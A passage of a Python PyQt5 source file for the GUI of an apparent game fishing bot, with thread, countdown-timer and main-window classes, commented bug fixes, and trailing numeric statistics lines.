    # Fix: pyqtSignal must be a *class* attribute to be bound by Qt's
    # metaclass; the original assigned it to a throwaway local inside
    # __init__, so the (commented-out) signal connections could never work.
    signal = pyqtSignal(object)

    def __init__(self, fn, f=False):
        super(Thread, self).__init__()
        self.f = f    # True → fn is the Fishit class, not a plain callable
        self.fn = fn

    # run method gets called when we start the thread
    def run(self):
        print("starting thread")
        if self.f:
            # NOTE(review): relies on the module-level global `w` (AppWindow)
            # existing before the thread starts.
            result = self.fn(w).CheckArea()
        else:
            result = self.fn()
        # w.gui.catched_edit.setText(str(process.fish_count))
        # w.gui.status_edit.setText(str(process.status))

    def stop(self):
        print("thread ended")
        self.terminate()


class Timer:
    """Wall-clock countdown that updates the GUI once per second.

    Runs for ``duration`` minutes or until the stopped label is set,
    whichever comes first.
    """

    def __init__(self, duration):
        super(Timer, self).__init__()
        self.dur = duration   # duration in minutes
        self.elapsed_s = 0
        self.elapsed_m = 0
        self.elapsed_h = 0
        self.total = 0        # total elapsed seconds (tick count)

    def timer(self):
        while (self.total <= (self.dur * 60)) and (w.gui.stoppedLabel.text() == ""):
            self.total += 1
            # Fix: derive h:m:s from the tick count with divmod. The original
            # hand-rolled rollover displayed "60" seconds/minutes for one tick
            # before wrapping.
            minutes, self.elapsed_s = divmod(self.total, 60)
            self.elapsed_h, self.elapsed_m = divmod(minutes, 60)
            time_text = (
                str(self.elapsed_h) + ":" + str(self.elapsed_m) + ":" + str(self.elapsed_s)
            )
            w.gui.time_edit.setText(time_text)
            time.sleep(1)
        w.gui.stoppedLabel.setText("Stopped")
        w.Clear()


class AppWindow(QMainWindow):
    """Main window: wires the generated Ui_Window to the fishing/timer threads."""

    def __init__(self):
        super(AppWindow, self).__init__()
        self.gui = gui.Ui_Window()
        self.gui.setupUi(self)
        self.timer = None  # created on demand in FishButton
        self.fish_thread = Thread(imagesearch.Fishit, f=True)
        self.gui.fish_button.clicked.connect(self.FishButton)
        # self.fish_thread.signal.connect(self.gui.status_label.setText)
        # self.fish_thread.signal.connect(self.finished)
        self.gui.stop_button.clicked.connect(self.Stop)

    def FishButton(self):
        """Start the fishing thread and a countdown timer for the chosen duration."""
        duration = int(self.gui.duration.currentText())
        self.gui.fish_button.setEnabled(False)
        self.gui.stoppedLabel.setText("")
        self.fish_thread.start()
        self.timer = Thread(Timer(duration).timer)
        self.timer.start()

    def Stop(self):
        """Stop the timer thread and reset the display."""
        self.gui.stoppedLabel.setText("Stopped")
        # Fix: pressing Stop before ever starting raised AttributeError
        # because self.timer did not exist yet.
        if self.timer is not None:
            self.timer.stop()
        self.Clear()
        self.time = 0

    def Clear(self):
        """Reset all GUI status fields and re-enable the start button."""
        self.gui.time_edit.setText("0:0:0")
        self.gui.catched_edit.setText("")
        self.gui.status_edit.setText("")
        self.gui.fish_button.setEnabled(True)


if __name__ == "__main__":
    app = QApplication(sys.argv)
    w = AppWindow()
    w.show()
    app.exec_()
29.295918
97
0.593173
359
2,871
4.562674
0.259053
0.087302
0.03663
0.031136
0.101343
0.068376
0.030525
0
0
0
0
0.012148
0.283177
2,871
98
98
29.295918
0.783771
0.1031
0
0.089744
0
0
0.02179
0
0
0
0
0
0
1
0.115385
false
0
0.102564
0
0.25641
0.025641
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0